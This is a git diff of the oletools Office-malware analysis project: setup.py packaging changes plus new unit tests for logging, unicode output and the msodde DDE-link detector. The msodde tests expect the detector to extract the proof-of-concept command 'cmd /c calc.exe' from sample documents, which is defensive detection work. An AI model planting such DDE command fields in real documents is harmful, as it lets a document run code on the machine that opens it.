+ "Programming Language :: Python :: 3.4",
+ "Programming Language :: Python :: 3.5",
+ "Programming Language :: Python :: 3.6",
+ "Programming Language :: Python :: 3.7",
+ "Programming Language :: Python :: 3.8",
"Topic :: Security",
"Topic :: Software Development :: Libraries :: Python Modules",
]
@@ -72,17 +88,14 @@
packages=[
"oletools",
+ "oletools.common",
+ "oletools.common.log_helper",
'oletools.thirdparty',
- 'oletools.thirdparty.olefile',
- 'oletools.thirdparty.easygui',
'oletools.thirdparty.xxxswf',
'oletools.thirdparty.prettytable',
'oletools.thirdparty.xglob',
- 'oletools.thirdparty.DridexUrlDecoder',
- 'oletools.thirdparty.pyparsing',
- 'oletools.thirdparty.colorclass',
'oletools.thirdparty.tablestream',
- 'oletools.thirdparty.zipfile27',
+ 'oletools.thirdparty.oledump',
]
##setupdir = '.'
##package_dir={'': setupdir}
@@ -158,16 +171,9 @@ def rglob(top, prefix='', pattern='*'):
+ rglob('oletools/doc', 'doc', '*.md')
+ rglob('oletools/doc', 'doc', '*.png'),
- 'oletools.thirdparty.olefile': [
- 'README.txt',
- 'LICENSE.txt',
- ],
'oletools.thirdparty.xglob': [
'LICENSE.txt',
],
- 'oletools.thirdparty.easygui': [
- 'LICENSE.txt',
- ],
'oletools.thirdparty.xxxswf': [
'LICENSE.txt',
],
@@ -177,15 +183,6 @@ def rglob(top, prefix='', pattern='*'):
'oletools.thirdparty.DridexUrlDecoder': [
'LICENSE.txt',
],
- 'oletools.thirdparty.pyparsing': [
- 'LICENSE', 'README',
- ],
- 'oletools.thirdparty.colorclass': [
- 'LICENSE.txt',
- ],
- 'oletools.thirdparty.zipfile27': [
- 'LICENSE.txt',
- ],
# 'oletools.thirdparty.tablestream': [
# 'LICENSE', 'README',
# ],
@@ -272,6 +269,7 @@ def rglob(top, prefix='', pattern='*'):
'console_scripts': [
'ezhexviewer=oletools.ezhexviewer:main',
'mraptor=oletools.mraptor:main',
+ 'mraptor3=oletools.mraptor3:main',
'olebrowse=oletools.olebrowse:main',
'oledir=oletools.oledir:main',
'oleid=oletools.oleid:main',
@@ -279,10 +277,12 @@ def rglob(top, prefix='', pattern='*'):
'olemeta=oletools.olemeta:main',
'oletimes=oletools.oletimes:main',
'olevba=oletools.olevba:main',
+ 'olevba3=oletools.olevba3:main',
'pyxswf=oletools.pyxswf:main',
'rtfobj=oletools.rtfobj:main',
'oleobj=oletools.oleobj:main',
'msodde=oletools.msodde:main',
+ 'olefile=olefile.olefile:main',
],
}
@@ -308,14 +308,22 @@ def main():
author_email=author_email,
url=url,
license=license,
-## package_dir=package_dir,
+ # package_dir=package_dir,
packages=packages,
package_data = package_data,
download_url=download_url,
-# data_files=data_files,
+ # data_files=data_files,
entry_points=entry_points,
test_suite="tests",
# scripts=scripts,
+ install_requires=[
+ "pyparsing>=2.1.0,<3", # changed from 2.2.0 to 2.1.0 for issue #481
+ "olefile>=0.46",
+ "easygui",
+ 'colorclass',
+ 'msoffcrypto-tool',
+ 'pcodedmp>=1.2.5',
+ ],
)
diff --git a/oletools/thirdparty/pyparsing/__init__.py b/tests/common/__init__.py
similarity index 100%
rename from oletools/thirdparty/pyparsing/__init__.py
rename to tests/common/__init__.py
diff --git a/tests/msodde_doc/__init__.py b/tests/common/log_helper/__init__.py
similarity index 100%
rename from tests/msodde_doc/__init__.py
rename to tests/common/log_helper/__init__.py
diff --git a/tests/common/log_helper/log_helper_test_imported.py b/tests/common/log_helper/log_helper_test_imported.py
new file mode 100644
index 00000000..8820a3e3
--- /dev/null
+++ b/tests/common/log_helper/log_helper_test_imported.py
@@ -0,0 +1,26 @@
+"""
+Dummy file that logs messages, meant to be imported
+by the main test file
+"""
+
+from oletools.common.log_helper import log_helper
+import logging
+
+DEBUG_MESSAGE = 'imported: debug log'
+INFO_MESSAGE = 'imported: info log'
+WARNING_MESSAGE = 'imported: warning log'
+ERROR_MESSAGE = 'imported: error log'
+CRITICAL_MESSAGE = 'imported: critical log'
+RESULT_MESSAGE = 'imported: result log'
+RESULT_TYPE = 'imported: result'
+
+logger = log_helper.get_or_create_silent_logger('test_imported', logging.ERROR)
+
+
+def log():
+ logger.debug(DEBUG_MESSAGE)
+ logger.info(INFO_MESSAGE)
+ logger.warning(WARNING_MESSAGE)
+ logger.error(ERROR_MESSAGE)
+ logger.critical(CRITICAL_MESSAGE)
+ logger.info(RESULT_MESSAGE, type=RESULT_TYPE)
diff --git a/tests/common/log_helper/log_helper_test_main.py b/tests/common/log_helper/log_helper_test_main.py
new file mode 100644
index 00000000..fb0ccca2
--- /dev/null
+++ b/tests/common/log_helper/log_helper_test_main.py
@@ -0,0 +1,64 @@
+""" Test log_helpers """
+
+import sys
+from tests.common.log_helper import log_helper_test_imported
+from oletools.common.log_helper import log_helper
+
+DEBUG_MESSAGE = 'main: debug log'
+INFO_MESSAGE = 'main: info log'
+WARNING_MESSAGE = 'main: warning log'
+ERROR_MESSAGE = 'main: error log'
+CRITICAL_MESSAGE = 'main: critical log'
+RESULT_MESSAGE = 'main: result log'
+RESULT_TYPE = 'main: result'
+
+logger = log_helper.get_or_create_silent_logger('test_main')
+
+
+def init_logging_and_log(args):
+ """
+    Try to cover possible logging scenarios. For each scenario covered, here are the expected args and outcome:
+ - Log without enabling: ['']
+ * logging when being imported - should never print
+ - Log as JSON without enabling: ['as-json', '']
+ * logging as JSON when being imported - should never print
+ - Enable and log: ['enable', '']
+ * logging when being run as script - should log messages
+ - Enable and log as JSON: ['as-json', 'enable', '']
+ * logging as JSON when being run as script - should log messages as JSON
+ - Enable, log as JSON and throw: ['enable', 'as-json', 'throw', '']
+ * should produce JSON-compatible output, even after an unhandled exception
+ """
+
+ # the level should always be the last argument passed
+ level = args[-1]
+ use_json = 'as-json' in args
+ throw = 'throw' in args
+ percent_autoformat = '%-autoformat' in args
+
+ if 'enable' in args:
+ log_helper.enable_logging(use_json, level, stream=sys.stdout)
+
+ _log()
+
+ if percent_autoformat:
+ logger.info('The %s is %d.', 'answer', 47)
+
+ if throw:
+ raise Exception('An exception occurred before ending the logging')
+
+ log_helper.end_logging()
+
+
+def _log():
+ logger.debug(DEBUG_MESSAGE)
+ logger.info(INFO_MESSAGE)
+ logger.warning(WARNING_MESSAGE)
+ logger.error(ERROR_MESSAGE)
+ logger.critical(CRITICAL_MESSAGE)
+ logger.info(RESULT_MESSAGE, type=RESULT_TYPE)
+ log_helper_test_imported.log()
+
+
+if __name__ == '__main__':
+ init_logging_and_log(sys.argv[1:])
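Reviewer note: the scenarios above rely on module-level loggers that stay silent until logging is explicitly enabled. A minimal standalone sketch of that pattern (an illustration of the idea, not the actual `log_helper` implementation):

```python
import io
import logging

def get_silent_logger(name, level=logging.DEBUG):
    """A logger that stays quiet until logging is enabled: the NullHandler
    swallows records and also suppresses Python's last-resort fallback."""
    logger = logging.getLogger(name)
    logger.setLevel(level)
    logger.addHandler(logging.NullHandler())
    return logger

def enable_logging(level, stream=None):
    """Attach a real handler to the root logger; records from the silent
    loggers propagate up to it and start appearing on `stream`."""
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter('%(levelname)-8s %(message)s'))
    root = logging.getLogger()
    root.addHandler(handler)
    root.setLevel(level)

logger = get_silent_logger('sketch')
logger.warning('before enabling')   # swallowed by the NullHandler
buf = io.StringIO()
enable_logging(logging.INFO, stream=buf)
logger.info('after enabling')
print(buf.getvalue().strip())       # INFO     after enabling
```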
diff --git a/tests/common/log_helper/test_log_helper.py b/tests/common/log_helper/test_log_helper.py
new file mode 100644
index 00000000..bcd0de0f
--- /dev/null
+++ b/tests/common/log_helper/test_log_helper.py
@@ -0,0 +1,170 @@
+""" Test the log helper
+
+This tests the generic log helper.
+Check if it handles imported modules correctly
+and that the default silent logger won't log when nothing is enabled
+"""
+
+import unittest
+import sys
+import json
+import subprocess
+from tests.common.log_helper import log_helper_test_main
+from tests.common.log_helper import log_helper_test_imported
+from os.path import dirname, join, relpath, abspath
+
+from tests.test_utils import PROJECT_ROOT
+
+# this is the common base of "tests" and "oletools" dirs
+TEST_FILE = relpath(join(dirname(abspath(__file__)), 'log_helper_test_main.py'),
+ PROJECT_ROOT)
+PYTHON_EXECUTABLE = sys.executable
+
+MAIN_LOG_MESSAGES = [
+ log_helper_test_main.DEBUG_MESSAGE,
+ log_helper_test_main.INFO_MESSAGE,
+ log_helper_test_main.WARNING_MESSAGE,
+ log_helper_test_main.ERROR_MESSAGE,
+ log_helper_test_main.CRITICAL_MESSAGE
+]
+
+
+class TestLogHelper(unittest.TestCase):
+ def test_it_doesnt_log_when_not_enabled(self):
+ output = self._run_test(['debug'])
+ self.assertTrue(len(output) == 0)
+
+ def test_it_doesnt_log_json_when_not_enabled(self):
+ output = self._run_test(['as-json', 'debug'])
+ self.assertTrue(len(output) == 0)
+
+ def test_logs_when_enabled(self):
+ output = self._run_test(['enable', 'warning'])
+
+ expected_messages = [
+ log_helper_test_main.WARNING_MESSAGE,
+ log_helper_test_main.ERROR_MESSAGE,
+ log_helper_test_main.CRITICAL_MESSAGE,
+ log_helper_test_imported.WARNING_MESSAGE,
+ log_helper_test_imported.ERROR_MESSAGE,
+ log_helper_test_imported.CRITICAL_MESSAGE
+ ]
+
+ for msg in expected_messages:
+ self.assertIn(msg, output)
+
+ def test_logs_json_when_enabled(self):
+ output = self._run_test(['enable', 'as-json', 'critical'])
+
+ self._assert_json_messages(output, [
+ log_helper_test_main.CRITICAL_MESSAGE,
+ log_helper_test_imported.CRITICAL_MESSAGE
+ ])
+
+ def test_logs_type_ignored(self):
+ """Run test script with logging enabled at info level. Want no type."""
+ output = self._run_test(['enable', 'info'])
+
+ expect = '\n'.join([
+ 'INFO ' + log_helper_test_main.INFO_MESSAGE,
+ 'WARNING ' + log_helper_test_main.WARNING_MESSAGE,
+ 'ERROR ' + log_helper_test_main.ERROR_MESSAGE,
+ 'CRITICAL ' + log_helper_test_main.CRITICAL_MESSAGE,
+ 'INFO ' + log_helper_test_main.RESULT_MESSAGE,
+ 'INFO ' + log_helper_test_imported.INFO_MESSAGE,
+ 'WARNING ' + log_helper_test_imported.WARNING_MESSAGE,
+ 'ERROR ' + log_helper_test_imported.ERROR_MESSAGE,
+ 'CRITICAL ' + log_helper_test_imported.CRITICAL_MESSAGE,
+ 'INFO ' + log_helper_test_imported.RESULT_MESSAGE,
+ ])
+ self.assertEqual(output, expect)
+
+ def test_logs_type_in_json(self):
+ """Check type field is contained in json log."""
+ output = self._run_test(['enable', 'as-json', 'info'])
+
+ # convert to json preserving order of output
+ jout = json.loads(output)
+
+ jexpect = [
+ dict(type='msg', level='INFO',
+ msg=log_helper_test_main.INFO_MESSAGE),
+ dict(type='msg', level='WARNING',
+ msg=log_helper_test_main.WARNING_MESSAGE),
+ dict(type='msg', level='ERROR',
+ msg=log_helper_test_main.ERROR_MESSAGE),
+ dict(type='msg', level='CRITICAL',
+ msg=log_helper_test_main.CRITICAL_MESSAGE),
+ # this is the important entry (has a different "type" field):
+ dict(type=log_helper_test_main.RESULT_TYPE, level='INFO',
+ msg=log_helper_test_main.RESULT_MESSAGE),
+ dict(type='msg', level='INFO',
+ msg=log_helper_test_imported.INFO_MESSAGE),
+ dict(type='msg', level='WARNING',
+ msg=log_helper_test_imported.WARNING_MESSAGE),
+ dict(type='msg', level='ERROR',
+ msg=log_helper_test_imported.ERROR_MESSAGE),
+ dict(type='msg', level='CRITICAL',
+ msg=log_helper_test_imported.CRITICAL_MESSAGE),
+ # ... and this:
+ dict(type=log_helper_test_imported.RESULT_TYPE, level='INFO',
+ msg=log_helper_test_imported.RESULT_MESSAGE),
+ ]
+ self.assertEqual(jout, jexpect)
+
+ def test_percent_autoformat(self):
+ """Test that auto-formatting of log strings with `%` works."""
+ output = self._run_test(['enable', '%-autoformat', 'info'])
+ self.assertIn('The answer is 47.', output)
+
+ def test_json_correct_on_exceptions(self):
+ """
+ Test that even on unhandled exceptions our JSON is always correct
+ """
+ output = self._run_test(['enable', 'as-json', 'throw', 'critical'], False)
+ self._assert_json_messages(output, [
+ log_helper_test_main.CRITICAL_MESSAGE,
+ log_helper_test_imported.CRITICAL_MESSAGE
+ ])
+
+ def _assert_json_messages(self, output, messages):
+ try:
+ json_data = json.loads(output)
+ self.assertEqual(len(json_data), len(messages))
+
+ for i in range(len(messages)):
+ self.assertEqual(messages[i], json_data[i]['msg'])
+ except ValueError:
+ self.fail('Invalid json:\n' + output)
+
+ self.assertNotEqual(len(json_data), 0, msg='Output was empty')
+
+ def _run_test(self, args, should_succeed=True):
+ """
+ Use subprocess to better simulate the real scenario and avoid
+ logging conflicts when running multiple tests (since logging depends on singletons,
+        we might get errors or false positives between sequential test runs)
+ """
+ child = subprocess.Popen(
+ [PYTHON_EXECUTABLE, TEST_FILE] + args,
+ shell=False,
+ env={'PYTHONPATH': PROJECT_ROOT},
+ universal_newlines=True,
+ cwd=PROJECT_ROOT,
+ stdin=None,
+ stdout=subprocess.PIPE,
+ stderr=subprocess.PIPE
+ )
+ (output, output_err) = child.communicate()
+
+ if not isinstance(output, str):
+ output = output.decode('utf-8')
+
+ self.assertEqual(child.returncode == 0, should_succeed)
+
+ return output.strip()
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/common/test_encoding_handler.py b/tests/common/test_encoding_handler.py
new file mode 100644
index 00000000..42d4565c
--- /dev/null
+++ b/tests/common/test_encoding_handler.py
@@ -0,0 +1,207 @@
+"""Test common.ensure_stdout_handles_unicode"""
+
+from __future__ import print_function
+
+import unittest
+import sys
+from subprocess import check_call, CalledProcessError
+from tempfile import mkstemp
+import os
+from os.path import isfile
+from contextlib import contextmanager
+
+FILE_TEXT = u'The unicode check mark is \u2713.\n'
+
+@contextmanager
+def temp_file(just_name=True):
+ """Context manager that creates temp file and deletes it in the end"""
+ tmp_descriptor = None
+ tmp_name = None
+ tmp_handle = None
+ try:
+ tmp_descriptor, tmp_name = mkstemp()
+
+ # we create our own file handle since we want to be able to close the
+ # file and open it again for reading.
+ # We keep the os-level descriptor open so file name is still reserved
+ # for us
+ if just_name:
+ yield tmp_name
+ else:
+ tmp_handle = open(tmp_name, 'wb')
+ yield tmp_handle, tmp_name
+ except Exception:
+ raise
+ finally:
+ if tmp_descriptor is not None:
+ os.close(tmp_descriptor)
+ if tmp_handle is not None:
+ tmp_handle.close()
+ if tmp_name is not None and isfile(tmp_name):
+ os.unlink(tmp_name)
+
+
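Reviewer note: the `temp_file` helper above combines `mkstemp` with a `finally` block; the core pattern, standalone (hypothetical `named_temp`, simplified to the name-only case):

```python
import os
from contextlib import contextmanager
from tempfile import mkstemp

@contextmanager
def named_temp():
    # same core idea as temp_file above: keep the OS-level descriptor
    # open so the name stays reserved, delete the file on exit
    descriptor, name = mkstemp()
    try:
        yield name
    finally:
        os.close(descriptor)
        if os.path.isfile(name):
            os.unlink(name)

with named_temp() as path:
    with open(path, 'w') as writer:
        writer.write('hello')
    with open(path) as reader:
        print(reader.read())     # hello
print(os.path.isfile(path))      # False: cleaned up on exit
```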
+class TestEncodingHandler(unittest.TestCase):
+ """Tests replacing stdout encoding in various scenarios"""
+
+ def test_print(self):
+ """Test regular unicode output not raise error"""
+ check_call('{python} {this_file} print'.format(python=sys.executable,
+ this_file=__file__),
+ shell=True)
+
+ def test_print_redirect(self):
+ """
+ Test redirection of unicode output to files does not raise error
+
+ TODO: test this on non-linux OSs
+ """
+ with temp_file() as tmp_file:
+ check_call('{python} {this_file} print > {tmp_file}'
+ .format(python=sys.executable, this_file=__file__,
+ tmp_file=tmp_file),
+ shell=True)
+
+ @unittest.skipIf(not sys.platform.startswith('linux'),
+                     'Only tested on linux so far')
+ def test_print_no_lang(self):
+ """
+        Test that unicode output does not raise an error when LANG=C (no usable locale)
+
+ TODO: Adapt this for other OSs; for win create batch script
+ """
+ check_call('LANG=C {python} {this_file} print'
+ .format(python=sys.executable, this_file=__file__),
+ shell=True)
+
+ def test_uopen(self):
+ """Test that uopen in a nice environment is ok"""
+ with temp_file(False) as (tmp_handle, tmp_file):
+ tmp_handle.write(FILE_TEXT.encode('utf8'))
+ tmp_handle.close()
+
+ try:
+ check_call('{python} {this_file} read {tmp_file}'
+ .format(python=sys.executable, this_file=__file__,
+ tmp_file=tmp_file),
+ shell=True)
+ except CalledProcessError as cpe:
+ self.fail(cpe.output)
+
+ def test_uopen_redirect(self):
+ """
+ Test redirection of unicode output to files does not raise error
+
+ TODO: test this on non-linux OSs
+ """
+ with temp_file(False) as (tmp_handle, tmp_file):
+ tmp_handle.write(FILE_TEXT.encode('utf8'))
+ tmp_handle.close()
+
+ with temp_file() as redirect_file:
+ try:
+ check_call(
+ '{python} {this_file} read {tmp_file} >{redirect_file}'
+ .format(python=sys.executable, this_file=__file__,
+ tmp_file=tmp_file, redirect_file=redirect_file),
+ shell=True)
+ except CalledProcessError as cpe:
+ self.fail(cpe.output)
+
+ @unittest.skipIf(not sys.platform.startswith('linux'),
+                     'Only tested on linux so far')
+ def test_uopen_no_lang(self):
+ """
+ Test that uopen in a C-LANG environment is ok
+
+ TODO: Adapt this for other OSs; for win create batch script
+ """
+ with temp_file(False) as (tmp_handle, tmp_file):
+ tmp_handle.write(FILE_TEXT.encode('utf8'))
+ tmp_handle.close()
+
+ try:
+ check_call('LANG=C {python} {this_file} read {tmp_file}'
+ .format(python=sys.executable, this_file=__file__,
+ tmp_file=tmp_file),
+ shell=True)
+ except CalledProcessError as cpe:
+ self.fail(cpe.output)
+
+
+def run_read(filename):
+ """This is called from test_uopen* tests as script. Reads text, compares"""
+ from oletools.common.io_encoding import uopen
+ # open file
+ with uopen(filename, 'rt') as reader:
+ # a few tests
+ if reader.closed:
+ raise ValueError('handle is closed!')
+ if reader.name != filename:
+ raise ValueError('Wrong filename {}'.format(reader.name))
+ if reader.isatty():
+ raise ValueError('Reader is a tty!')
+ if reader.tell() != 0:
+ raise ValueError('Reader.tell is not 0 at beginning')
+
+ # read text
+ text = reader.read()
+
+ # a few more tests
+ if not reader.closed:
+ raise ValueError('Reader is not closed outside context')
+ if reader.name != filename:
+ raise ValueError('Wrong filename {} after context'.format(reader.name))
+ # the following test raises an exception because reader is closed, so isatty cannot be called:
+ # if reader.isatty():
+ # raise ValueError('Reader has become a tty!')
+
+ # compare text
+ if sys.version_info.major <= 2: # in python2 get encoded byte string
+ expect = FILE_TEXT.encode('utf8')
+ else: # python3: should get real unicode
+ expect = FILE_TEXT
+ if text != expect:
+ raise ValueError('Wrong contents: {!r} != {!r}'
+ .format(text, expect))
+ return 0
+
+
+def run_print():
+ """This is called from test_read* tests as script. Prints & logs unicode"""
+ from oletools.common.io_encoding import ensure_stdout_handles_unicode
+ from oletools.common.log_helper import log_helper
+ ensure_stdout_handles_unicode()
+ print(u'Check: \u2713') # print check mark
+
+ # check logging as well
+ logger = log_helper.get_or_create_silent_logger('test_encoding_handler')
+ log_helper.enable_logging(False, 'debug', stream=sys.stdout)
+ logger.info(u'Check: \u2713')
+ return 0
+
+
+# tests call this file as script
+if __name__ == '__main__':
+ if len(sys.argv) < 2:
+ sys.exit(unittest.main())
+
+ # hack required to import common from parent dir, not system-wide one
+ # (usually unittest seems to do that for us)
+ from os.path import abspath, dirname, join
+ ole_base = dirname(dirname(dirname(abspath(__file__))))
+ sys.path.insert(0, ole_base)
+
+ if sys.argv[1] == 'print':
+ if len(sys.argv) > 2:
+ print('Expect no arg for "print"', file=sys.stderr)
+ sys.exit(2)
+ sys.exit(run_print())
+ elif sys.argv[1] == 'read':
+ if len(sys.argv) != 3:
+ print('Expect single arg for "read"', file=sys.stderr)
+ sys.exit(2)
+ sys.exit(run_read(sys.argv[2]))
+ else:
+ print('Unexpected argument: {}'.format(sys.argv[1]), file=sys.stderr)
+ sys.exit(2)
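Reviewer note: a standalone sketch of the idea behind `ensure_stdout_handles_unicode` that this script exercises (hypothetical `wrap_for_unicode`; the real helper rewraps `sys.stdout` itself):

```python
import io

def wrap_for_unicode(byte_stream, encoding='utf-8'):
    """Wrap a byte stream so writing unicode text cannot raise
    UnicodeEncodeError (unencodable characters are replaced)."""
    return io.TextIOWrapper(byte_stream, encoding=encoding,
                            errors='replace')

raw = io.BytesIO()
out = wrap_for_unicode(raw)
out.write(u'Check: \u2713\n')   # check mark; would crash an ascii-only stream
out.flush()
print(raw.getvalue().decode('utf-8'))
```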
diff --git a/tests/howto_add_unittests.txt b/tests/howto_add_unittests.txt
index 3178741e..2501bcc1 100644
--- a/tests/howto_add_unittests.txt
+++ b/tests/howto_add_unittests.txt
@@ -1,8 +1,12 @@
Howto: Add unittests
--------------------
-For helping python's unittest to discover your tests, do the
-following:
+Note: The following are just guidelines to help inexperienced users create unit
+tests. The python unittest library (see
+https://docs.python.org/2/library/unittest.html) offers much more flexibility
+than described here.
+
+For helping python's unittest to discover your tests, do the following:
* create a subdirectory within oletools/tests/
- The directory name must be a valid python package name,
diff --git a/tests/msodde/__init__.py b/tests/msodde/__init__.py
new file mode 100644
index 00000000..e69de29b
diff --git a/tests/msodde/test_basic.py b/tests/msodde/test_basic.py
new file mode 100644
index 00000000..9d658bdf
--- /dev/null
+++ b/tests/msodde/test_basic.py
@@ -0,0 +1,224 @@
+""" Test some basic behaviour of msodde.py
+
+Ensure that
+- doc and docx are read without error
+- garbage returns error return status
+- dde-links are found where appropriate
+"""
+
+from __future__ import print_function
+
+import unittest
+import sys
+import os
+from os.path import join, basename
+from traceback import print_exc
+import json
+from collections import OrderedDict
+from oletools import msodde
+from oletools.crypto import \
+ WrongEncryptionPassword, CryptoLibNotImported, check_msoffcrypto
+from tests.test_utils import call_and_capture, DATA_BASE_DIR as BASE_DIR
+
+
+class TestReturnCode(unittest.TestCase):
+ """ check return codes and exception behaviour (not text output) """
+ def test_valid_doc(self):
+ """ check that a valid doc file leads to 0 exit status """
+ for filename in (
+ 'harmless-clean',
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ # 'dde-test-from-office2003',
+ # 'dde-test-from-office2016',
+ # 'dde-test-from-office2013-utf_16le-korean'
+ ):
+ self.do_test_validity(join(BASE_DIR, 'msodde',
+ filename + '.doc'))
+
+ def test_valid_docx(self):
+ """ check that a valid docx file leads to 0 exit status """
+ for filename in 'dde-test', 'harmless-clean':
+ self.do_test_validity(join(BASE_DIR, 'msodde',
+ filename + '.docx'))
+
+ def test_valid_docm(self):
+ """ check that a valid docm file leads to 0 exit status """
+ for filename in 'dde-test', 'harmless-clean':
+ self.do_test_validity(join(BASE_DIR, 'msodde',
+ filename + '.docm'))
+
+ def test_valid_xml(self):
+ """ check that xml leads to 0 exit status """
+ for filename in (
+ 'harmless-clean-2003.xml',
+ 'dde-in-excel2003.xml',
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ # 'dde-in-word2003.xml',
+ # 'dde-in-word2007.xml'
+ ):
+ self.do_test_validity(join(BASE_DIR, 'msodde', filename))
+
+ def test_invalid_none(self):
+ """ check that no file argument leads to non-zero exit status """
+ if sys.hexversion > 0x03030000: # version 3.3 and higher
+ # different errors probably depending on whether msoffcryto is
+ # available or not
+ expect_error = (AttributeError, FileNotFoundError)
+ else:
+ expect_error = (AttributeError, IOError)
+ self.do_test_validity('', expect_error)
+
+ def test_invalid_empty(self):
+ """ check that empty file argument leads to non-zero exit status """
+ self.do_test_validity(join(BASE_DIR, 'basic/empty'), Exception)
+
+ def test_invalid_text(self):
+ """ check that text file argument leads to non-zero exit status """
+ self.do_test_validity(join(BASE_DIR, 'basic/text'), Exception)
+
+ def test_encrypted(self):
+ """
+ check that encrypted files lead to non-zero exit status
+
+ Currently, only the encryption applied by Office 2010 (CryptoApi RC4
+ Encryption) is tested.
+ """
+ CRYPT_DIR = join(BASE_DIR, 'encrypted')
+ have_crypto = check_msoffcrypto()
+ for filename in os.listdir(CRYPT_DIR):
+ if have_crypto and 'standardpassword' in filename:
+ # these are automagically decrypted
+ self.do_test_validity(join(CRYPT_DIR, filename))
+ elif have_crypto:
+ self.do_test_validity(join(CRYPT_DIR, filename),
+ WrongEncryptionPassword)
+ else:
+ self.do_test_validity(join(CRYPT_DIR, filename),
+ CryptoLibNotImported)
+
+ def do_test_validity(self, filename, expect_error=None):
+ """ helper for test_[in]valid_* """
+ found_error = None
+ # DEBUG: print('Testing file {}'.format(filename))
+ try:
+ msodde.process_maybe_encrypted(filename,
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ except Exception as exc:
+ found_error = exc
+ # DEBUG: print_exc()
+
+ if expect_error and not found_error:
+ self.fail('Expected {} but msodde finished without errors for {}'
+ .format(expect_error, filename))
+ elif not expect_error and found_error:
+ self.fail('Unexpected error {} from msodde for {}'
+ .format(found_error, filename))
+ elif expect_error and not isinstance(found_error, expect_error):
+ self.fail('Wrong kind of error {} from msodde for {}, expected {}'
+ .format(type(found_error), filename, expect_error))
+
+
+@unittest.skipIf(not check_msoffcrypto(),
+ 'Module msoffcrypto not installed for {}'
+ .format(basename(sys.executable)))
+class TestErrorOutput(unittest.TestCase):
+ """msodde does not specify error by return code but text output."""
+
+ def test_crypt_output(self):
+ """Check for helpful error message when failing to decrypt."""
+ for suffix in 'doc', 'docm', 'docx', 'ppt', 'pptm', 'pptx', 'xls', \
+ 'xlsb', 'xlsm', 'xlsx':
+ example_file = join(BASE_DIR, 'encrypted', 'encrypted.' + suffix)
+ output, ret_code = call_and_capture('msodde', [example_file, ],
+ accept_nonzero_exit=True)
+ self.assertEqual(ret_code, 1)
+ self.assertIn('passwords could not decrypt office file', output,
+ msg='Unexpected output: {}'.format(output.strip()))
+
+
+class TestDdeLinks(unittest.TestCase):
+ """ capture output of msodde and check dde-links are found correctly """
+
+ @staticmethod
+ def get_dde_from_output(output):
+ """ helper to read dde links from captured output
+ """
+ return [o for o in output.splitlines()]
+
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ # def test_with_dde(self):
+ # """ check that dde links appear on stdout """
+ # filename = 'dde-test-from-office2003.doc'
+ # output = msodde.process_maybe_encrypted(
+ # join(BASE_DIR, 'msodde', filename),
+ # field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ # self.assertNotEqual(len(self.get_dde_from_output(output)), 0,
+ # msg='Found no dde links in output of ' + filename)
+
+ def test_no_dde(self):
+ """ check that no dde links appear on stdout """
+ filename = 'harmless-clean.doc'
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', filename),
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ self.assertEqual(len(self.get_dde_from_output(output)), 0,
+ msg='Found dde links in output of ' + filename)
+
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ # def test_with_dde_utf16le(self):
+ # """ check that dde links appear on stdout """
+ # filename = 'dde-test-from-office2013-utf_16le-korean.doc'
+ # output = msodde.process_maybe_encrypted(
+ # join(BASE_DIR, 'msodde', filename),
+ # field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ # self.assertNotEqual(len(self.get_dde_from_output(output)), 0,
+ # msg='Found no dde links in output of ' + filename)
+
+ def test_excel(self):
+ """ check that dde links are found in excel 2007+ files """
+ expect = ['cmd /c calc.exe', ]
+ for extn in 'xlsx', 'xlsm', 'xlsb':
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', 'dde-test.' + extn),
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+
+ self.assertEqual(expect, self.get_dde_from_output(output),
+ msg='unexpected output for dde-test.{0}: {1}'
+ .format(extn, output))
+
+ def test_xml(self):
+ """ check that dde in xml from word / excel is found """
+ # TODO: TEMPORARILY DISABLED UNTIL ISSUE #215 IS FIXED:
+ for name_part in ('excel2003',): #, 'word2003', 'word2007':
+ filename = 'dde-in-' + name_part + '.xml'
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', filename),
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ links = self.get_dde_from_output(output)
+ self.assertEqual(len(links), 1, 'found {0} dde-links in {1}'
+ .format(len(links), filename))
+ self.assertTrue('cmd' in links[0], 'no "cmd" in dde-link for {0}'
+ .format(filename))
+ self.assertTrue('calc' in links[0], 'no "calc" in dde-link for {0}'
+ .format(filename))
+
+ def test_clean_rtf_blacklist(self):
+ """ find a lot of hyperlinks in rtf spec """
+ filename = 'RTF-Spec-1.7.rtf'
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', filename),
+ field_filter_mode=msodde.FIELD_FILTER_BLACKLIST)
+ self.assertEqual(len(self.get_dde_from_output(output)), 1413)
+
+ def test_clean_rtf_ddeonly(self):
+ """ find no dde links in rtf spec """
+ filename = 'RTF-Spec-1.7.rtf'
+ output = msodde.process_maybe_encrypted(
+ join(BASE_DIR, 'msodde', filename),
+ field_filter_mode=msodde.FIELD_FILTER_DDE)
+ self.assertEqual(len(self.get_dde_from_output(output)), 0,
+ msg='Found dde links in output of ' + filename)
+
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/msodde/test_blacklist.py b/tests/msodde/test_blacklist.py
new file mode 100644
index 00000000..5a557f6b
--- /dev/null
+++ b/tests/msodde/test_blacklist.py
@@ -0,0 +1,250 @@
+""" Test the msodde blacklist feature
+
+Take a few examples from the standard (iso29500-1:2016) and see that they match
+"""
+
+import unittest
+from oletools.msodde import field_is_blacklisted
+
+EXAMPLES_MATCH = (
+ r'DATE',
+ r'DATE \@ "dddd, MMMM dd, yyyy"',
+ r'DATE \@ "dddd, MMMM dd, yyyy" \h',
+ r'DATE \@ "M/d/yyyy"',
+ r'DATE \@ "dddd, MMMM dd, yyyy"',
+ r'DATE \@ "MMMM d, yyyy"',
